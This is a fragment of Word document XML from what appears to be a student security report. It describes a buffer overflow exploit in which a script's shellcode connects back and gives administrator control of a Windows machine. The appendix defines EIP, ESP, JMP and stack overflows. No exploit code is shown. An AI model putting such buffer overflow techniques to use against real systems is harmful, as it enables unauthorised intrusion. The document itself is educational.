      <w:r>
        <w:rPr>
          <w:iCs/>
        </w:rPr>
        <w:t>W</w:t>
      </w:r>
      <w:r w:rsidR="006A13EC" w:rsidRPr="002358C6">
        <w:rPr>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">hen the shellScript4.py </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
        </w:rPr>
        <w:t>script run</w:t>
      </w:r>
      <w:r w:rsidR="009F30FD">
        <w:rPr>
          <w:iCs/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="002358C6">
        <w:rPr>
          <w:iCs/>
        </w:rPr>
        <w:t>the shellcode will execute and connect to the Windows machine, allowing full access control since the vulnerable program was executed as an administrator</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002358C6">
        <w:rPr>
          <w:iCs/>
        </w:rPr>
        <w:t>[Figure6.2].</w:t>
      </w:r>
      <w:r w:rsidR="006A13EC">
        <w:rPr>
          <w:iCs/>
          <w:noProof/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5B5CA163" wp14:editId="6E5C6252">
            <wp:extent cx="5943600" cy="3843020"/>
            <wp:effectExtent l="0" t="0" r="0" b="508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843020"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="593EA2F0" w14:textId="01A0AB21" w:rsidR="002358C6" w:rsidRDefault="002358C6" w:rsidP="002358C6">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E34B94">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>6.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00E34B94">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Gaining </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Root Access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C748F1D" w14:textId="3EA2FB44" w:rsidR="00B04B29" w:rsidRDefault="00B04B29" w:rsidP="00B04B29">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00C942D0" w14:textId="77777777" w:rsidR="00957B8D" w:rsidRDefault="00957B8D" w:rsidP="00B04B29">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6EF3E503" w14:textId="77777777" w:rsidR="00957B8D" w:rsidRDefault="00957B8D" w:rsidP="00B04B29">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="72163709" w14:textId="77777777" w:rsidR="00957B8D" w:rsidRDefault="00957B8D" w:rsidP="00B04B29">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F72C781" w14:textId="77777777" w:rsidR="00957B8D" w:rsidRDefault="00957B8D" w:rsidP="00B04B29">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0DE7A2ED" w14:textId="77777777" w:rsidR="00957B8D" w:rsidRDefault="00957B8D" w:rsidP="00B04B29">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="724E4348" w14:textId="77777777" w:rsidR="00957B8D" w:rsidRDefault="00957B8D" w:rsidP="00B04B29">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7F2BB229" w14:textId="77777777" w:rsidR="00957B8D" w:rsidRDefault="00957B8D" w:rsidP="00B04B29">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="33F94FDC" w14:textId="77777777" w:rsidR="00957B8D" w:rsidRDefault="00957B8D" w:rsidP="00B04B29">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="152F324D" w14:textId="77777777" w:rsidR="00957B8D" w:rsidRDefault="00957B8D" w:rsidP="00B04B29">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="56651C41" w14:textId="77777777" w:rsidR="00957B8D" w:rsidRDefault="00957B8D" w:rsidP="00B04B29">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F13650D" w14:textId="77777777" w:rsidR="00957B8D" w:rsidRDefault="00957B8D" w:rsidP="00B04B29">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="426DE7D1" w14:textId="77777777" w:rsidR="00957B8D" w:rsidRDefault="00957B8D" w:rsidP="00B04B29">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B34087C" w14:textId="77777777" w:rsidR="00957B8D" w:rsidRDefault="00957B8D" w:rsidP="00B04B29">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="696BC547" w14:textId="77777777" w:rsidR="00957B8D" w:rsidRDefault="00957B8D" w:rsidP="00B04B29">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="28B0E1BA" w14:textId="77777777" w:rsidR="00984B08" w:rsidRDefault="00984B08" w:rsidP="00957B8D">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="68CF14AE" w14:textId="77777777" w:rsidR="00984B08" w:rsidRDefault="00984B08" w:rsidP="00957B8D">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D8E2E3B" w14:textId="24D05EBC" w:rsidR="00B04B29" w:rsidRDefault="00957B8D" w:rsidP="00957B8D">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00957B8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>Appendices</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44FC399A" w14:textId="77777777" w:rsidR="00957B8D" w:rsidRPr="00957B8D" w:rsidRDefault="00957B8D" w:rsidP="00957B8D">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="360" w:after="240"/>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="24292E"/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00957B8D">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="24292E"/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>Definitions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B3AB24C" w14:textId="7FBFA38D" w:rsidR="00957B8D" w:rsidRPr="00957B8D" w:rsidRDefault="00957B8D" w:rsidP="00957B8D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00957B8D">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>The Extended Instruction Pointer (EIP) is a register that contains the address of the next instruction for the program or command.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>Can be seen on the immunity Debugger</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35D6CFEC" w14:textId="74375AAB" w:rsidR="00957B8D" w:rsidRPr="00957B8D" w:rsidRDefault="00957B8D" w:rsidP="00957B8D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00957B8D">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>The Extended Stack Pointer (ESP) is a register that lets you know where on the stack you are and allows you to push data in and out of the application.</w:t>
      </w:r>
      <w:r w:rsidRPr="00957B8D">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>Can be seen on the immunity Debugger</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CF36110" w14:textId="02E6F2E1" w:rsidR="00957B8D" w:rsidRPr="00957B8D" w:rsidRDefault="00957B8D" w:rsidP="00957B8D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="60" w:after="100" w:afterAutospacing="1"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00957B8D">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>The Jump (JMP) is an instruction that modifies the flow of execution where the operand designate</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>d</w:t>
      </w:r>
      <w:r w:rsidRPr="00957B8D">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> will contain the address being jumped to.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FDF4B7F" w14:textId="35A13BEA" w:rsidR="00957B8D" w:rsidRDefault="00957B8D" w:rsidP="00957B8D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="60" w:after="100" w:afterAutospacing="1"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00957B8D">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>\x41, \x42, - The hexadecimal values for A</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="00957B8D">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>B.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05845D73" w14:textId="6751C534" w:rsidR="00984B08" w:rsidRDefault="00984B08" w:rsidP="00957B8D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="60" w:after="100" w:afterAutospacing="1"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>Buffer is a temporary area in memory which can hold the values of a program in between execution process.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47074191" w14:textId="75EADD42" w:rsidR="00984B08" w:rsidRDefault="00984B08" w:rsidP="00957B8D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="60" w:after="100" w:afterAutospacing="1"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>Buffer Overflow attack is the process of exceeding buffer boundaries using input data and overwriting any adjacent memory locations to conduct malicious intents.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E3725D6" w14:textId="6E2FE34A" w:rsidR="00984B08" w:rsidRDefault="00984B08" w:rsidP="00984B08">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="60" w:after="100" w:afterAutospacing="1"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="24292E"/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00984B08">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="24292E"/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">Anatomy of </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="24292E"/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">a </w:t>
      </w:r>
      <w:r w:rsidRPr="00984B08">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="24292E"/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>Stack:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D28503B" w14:textId="59FFD278" w:rsidR="00984B08" w:rsidRPr="00957B8D" w:rsidRDefault="00984B08" w:rsidP="00984B08">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="60" w:after="100" w:afterAutospacing="1"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="24292E"/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00984B08">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="24292E"/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="463A2846" wp14:editId="73F0E6DC">
            <wp:extent cx="5943600" cy="3244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44850"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="33E52AA8" w14:textId="77777777" w:rsidR="00957B8D" w:rsidRPr="00957B8D" w:rsidRDefault="00957B8D" w:rsidP="00957B8D">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00957B8D" w:rsidRPr="00957B8D" w:rsidSect="008822EB">
      <w:footerReference w:type="even" r:id="rId40"/>
      <w:footerReference w:type="default" r:id="rId41"/>
      <w:pgSz w:w="12240" w:h="15840" w:code="1"/>
      <w:pgMar w:top="426" w:right="1440" w:bottom="426"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973162" w14:textId="77777777" w:rsidR="009F46CB" w:rsidRDefault="009F46CB" w:rsidP="0006271E">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="23FD8BB7" w14:textId="77777777" w:rsidR="009F46CB" w:rsidRDefault="009F46CB" w:rsidP="00062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Franklin Gothic Book">
    <w:altName w:val="Franklin Gothic"/>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76420444"/>
      <w:docPartObj>
        <w:docPartGallery w:val="Page Numbers (Bottom of Page)"/>
        <w:docPartUnique/>
      </w:docPartObj>
    </w:sdtPr>
    <w:sdtContent>
      <w:p w14:paraId="15A48326" w14:textId="77777777" w:rsidR="00220A2F" w:rsidRDefault="00220A2F" w:rsidP="00220A2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47FB61" w14:textId="77777777" w:rsidR="00220A2F" w:rsidRDefault="00220A2F" w:rsidP="000627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96635694"/>
      <w:docPartObj>
        <w:docPartGallery w:val="Page Numbers (Bottom of Page)"/>
        <w:docPartUnique/>
      </w:docPartObj>
    </w:sdtPr>
    <w:sdtContent>
      <w:p w14:paraId="6505D2B7" w14:textId="77777777" w:rsidR="00220A2F" w:rsidRDefault="00220A2F" w:rsidP="00A45A59">
        <w:pPr>
          <w:pStyle w:val="Footer"/>
        </w:pPr>
        <w:r w:rsidRPr="00D85677">
          <w:rPr>
            <w:rStyle w:val="PageNumber"/>
            <w:rFonts w:ascii="Corbel" w:hAnsi="Corbel"/>
          </w:rPr>
          <w:t xml:space="preserve">PAGE </w:t>
        </w:r>
        <w:r w:rsidRPr="00D85677">
          <w:rPr>
            <w:rStyle w:val="PageNumber"/>
            <w:rFonts w:ascii="Corbel" w:hAnsi="Corbel"/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidRPr="00D85677">
          <w:rPr>
            <w:rStyle w:val="PageNumber"/>
            <w:rFonts w:ascii="Corbel" w:hAnsi="Corbel"/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGE </w:instrText>
        </w:r>
        <w:r w:rsidRPr="00D85677">
          <w:rPr>
            <w:rStyle w:val="PageNumber"/>
            <w:rFonts w:ascii="Corbel" w:hAnsi="Corbel"/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidRPr="00D85677">
          <w:rPr>
            <w:rStyle w:val="PageNumber"/>
            <w:rFonts w:ascii="Corbel" w:hAnsi="Corbel"/>
            <w:noProof/>
          </w:rPr>
          <w:t>2</w:t>
        </w:r>
        <w:r w:rsidRPr="00D85677">
          <w:rPr>
            <w:rStyle w:val="PageNumber"/>
            <w:rFonts w:ascii="Corbel" w:hAnsi="Corbe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5FA761" w14:textId="77777777" w:rsidR="009F46CB" w:rsidRDefault="009F46CB" w:rsidP="0006271E">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="6AF8990F" w14:textId="77777777" w:rsidR="009F46CB" w:rsidRDefault="009F46CB" w:rsidP="000627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706C9"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="75106328"/>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F3665C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="EF764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65E0C33"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="82DEF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C25F0A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B4D83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F43D5C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="5036A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A4360A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="AAB46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22F7709"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="AC584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lvlOverride w:ilvl="0"/>
    <w:lvlOverride w:ilvl="1"/>
    <w:lvlOverride w:ilvl="2"/>
    <w:lvlOverride w:ilvl="3"/>
    <w:lvlOverride w:ilvl="4"/>
    <w:lvlOverride w:ilvl="5"/>
    <w:lvlOverride w:ilvl="6"/>
    <w:lvlOverride w:ilvl="7"/>
    <w:lvlOverride w:ilvl="8"/>
  </w:num>
  <w:num w:numId="2">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="3">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="4">
    <w:abstractNumId w:val="4"/>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B85"/>
    <w:rsid w:val="00017B10"/>
    <w:rsid w:val="00056442"/>
    <w:rsid w:val="0006271E"/>
    <w:rsid w:val="0007596F"/>
    <w:rsid w:val="000B5D29"/>
    <w:rsid w:val="000D54C3"/>
    <w:rsid w:val="00102114"/>
    <w:rsid w:val="00116639"/>
    <w:rsid w:val="00153167"/>
    <w:rsid w:val="00173543"/>
    <w:rsid w:val="001E06EE"/>
    <w:rsid w:val="00220A2F"/>
    <w:rsid w:val="002358C6"/>
    <w:rsid w:val="00254D5A"/>
    <w:rsid w:val="0026793F"/>
    <w:rsid w:val="002752F8"/>
    <w:rsid w:val="00296EBB"/>
    <w:rsid w:val="002C4BC1"/>
    <w:rsid w:val="00314EDE"/>
    <w:rsid w:val="00333C51"/>
    <w:rsid w:val="00370139"/>
    <w:rsid w:val="003A4D7B"/>
    <w:rsid w:val="003E6A7E"/>
    <w:rsid w:val="00420339"/>
    <w:rsid w:val="00492C33"/>
    <w:rsid w:val="004A7613"/>
